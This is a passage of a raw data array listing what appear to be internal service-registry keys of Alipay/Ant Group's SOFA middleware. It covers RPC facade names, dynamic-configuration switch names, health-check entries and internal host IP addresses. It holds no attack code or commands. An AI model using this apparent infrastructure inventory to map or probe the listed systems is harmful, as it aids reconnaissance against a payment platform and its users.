ervice.MobileAdapterService:1.0:promobffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsEndorsementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.whiteUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_AMLDATAPROC#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.afts.common.service.facade.XnnInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tss.supportprod.facade.bds.facade.log.BdsBizOperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.impl.FixedSlowSQLManageDRMResource.switchConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.moon.MoonCakeFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.redeemStartTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fiscore.common.service.facade.api.CreditBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.BatchExitActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adame@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@infostudio#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","CateOrderFacade.class:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpayprod.common.service.facade.services.BankCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.ordercenter.facade.service.OrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.SceneDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.188.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:testzky@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.170.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.apyunqing.common.service.facade.application.DataMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.merchantdataview.LindormQueryDataviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.masterdata.uniform.resource.changeLogSeq,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.facade.ChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.service.invest.api.InvestLoanDailyConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.SettleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.aiSendFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:baoXiaoPreContractPushToVaildHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.218.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.userview.config.facade.UVLabelConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantPageQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.151.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkroute.common.service.trigger.RMCDataQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.PermissionCompensateManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.facade.api.FundProductAnalyzeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.CIResourcesService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.facade.CodeImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insendorseprod.common.service.inner.InsInnerEndorsementOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:common_Brand_ProcessFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finriskmngcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.spi.callback.PaymentCallbackService:1.0:forexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.test.TestRecordAndPlayback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.spi.BizSolutionQueryFacade:1.0:fincoretechdss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:yebcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.api.PaymentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.utp.OrderPaymentFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.248.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapitool.facade.ugw.UnifygwServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdtunical.common.service.facade.http.DynamicTaskRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.SeniorNewsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.DisplayCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antgroup.zmxy.zmepconnector.facade.service.EpPlacementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.menu.PamMenuCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.ad.rpc.AdService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradePaymentClauseQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PUBLICCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OPSAPP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.212.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.isCloseSpringTwentyLottie,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bis.common.service.facade.papers.PapersAdviceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_SQ_STABLE_CRoute#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pcardsales:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifycore.service.facade.GongAnAuditService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clientsc.service.facade.account.FindAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.manage.KbservApplyOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zhub.smilepay.SmilePayPromotionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:signOrderPaidHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.DeliverAddressConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.biz.platform.task.complainmessage.ComplainTaskProgressService:1.0:complainTaskProgressService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmDownGradeResourceTrigger.defaultChannelRouteStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.receipt.ReceiptSelfEvidenceNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.verify.rpc.facade.ExamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.CertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkassetmore_rejectedProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.api.TimeoutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:idocs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.paymentmng.pmtconfigDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.attribute.CatalogAttributeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:aircoreservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferToAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.46.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fin.arcore.common.service.facade.z.api.rzone.ArAccountRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquota.common.service.CreditQuotaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.invite.InviteGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dk.common.service.facade.notify.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:tbapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.StdTitleQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianmerchant.common.service.api.bxh.InsMerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscenter.service.workform.compensation.facade.CompensationCatService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iaccenter.facade.query.api.TitleRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MASTERDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.61.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataCacheDRM.refreshMDCacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbshopdetail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.link.TreeRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.MerchantSwitchTriggerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditmng.yuqing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.service.facade.BatchRecService:1.0:batchRecService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.PayAuthDeviceIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rconehub.common.facade.service.router.OnehubRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.access.RoleAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.profile.admin.ProfileAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IEXCLIENTTRDCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.testaccount.AgdsccTestAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zappinfo.zappinfo_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linke.aci.rest.jenkins.JenkinsTestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.opsware.api.facade.ops.VMServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-oasistwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_SCCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dcprod.common.service.facade.CommunityUserTraceRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.SendItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exctrade.service.facade.ExchangePriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataSvnCommitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imkteye.common.service.facade.api.retention.RetentionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.PkgConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.routeClient:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.userList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdiscountprod.common.service.facade.spi.KabaoprodSpiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MstlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.luckyfish.repo.FinsCampConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditbizcore.common.service.facade.service.CreditSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.CollectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.moneyfund.api.MftransTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.detect.EcoDetectSerialFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_KBSERV#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linkede.metacenter.common.service.facade.AppCommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_finishProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antinvoice.common.service.facade.api.EinvOpenEntranceShowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.recmixer.common.service.mng.facade.ChannelMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExStandardProductRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_COD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:zptcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.LaunchAdminFacade:1.0:air@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.BusinessRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcheck.transmitcheck.TransmitCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.BatchOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.32.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zappinfo:name=com.alipay.zpaas.zappinfo.core.service.transcation.TransactionLogConfigDrmResource.limit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.facade.AccessTokenViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:opscloudprod_subscribe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAssetSortDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.IaasConnectorFactory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.order.VccTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.queryAllStores,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.AppRoleConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.OptCodeManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_ST2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifeprod.common.service.facade.api.announce.LifeAnnouncementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.AcpProjectGTasksService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.grayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowAttachmentInfoGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.ContractSignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.reservecenter.common.service.facade.api.NetDebitLimitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.ha.FinHaEmergencyConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antsycm.common.service.facade.datamock.SycmQuerySyncRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsconsole.facade.channel.command.CommandExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.CipherCertQueryFacade:1.0:fccryptprod_boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.osprey.service.IDocViewService:1.0:docViewService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.BankCardBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.knowledge.facade.KnowledgeCatSearchableQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.vpc.VPCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.yunfengdieweb:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_DCEPCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.197.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.122.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.biz.donateRPC.api.DonateDeductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.systems,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smartscene.weather.task.WeatherTaskScheduleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.match.api.MatchDomainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.partnerprod.common.service.facade.investigate.InvestigateAttachmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:fintrmbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.finfundtrade.FundTradeOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.facade.BusinessActivityRemoteManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.ProdExpireNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.zproxy.VerifyZpFacade:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.25.233.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@alphaq#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Pub_Servers_TP_S_FILECORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.inst.GrayControlConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:icrman@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.EcoPageDetectTagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.core.ProductPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.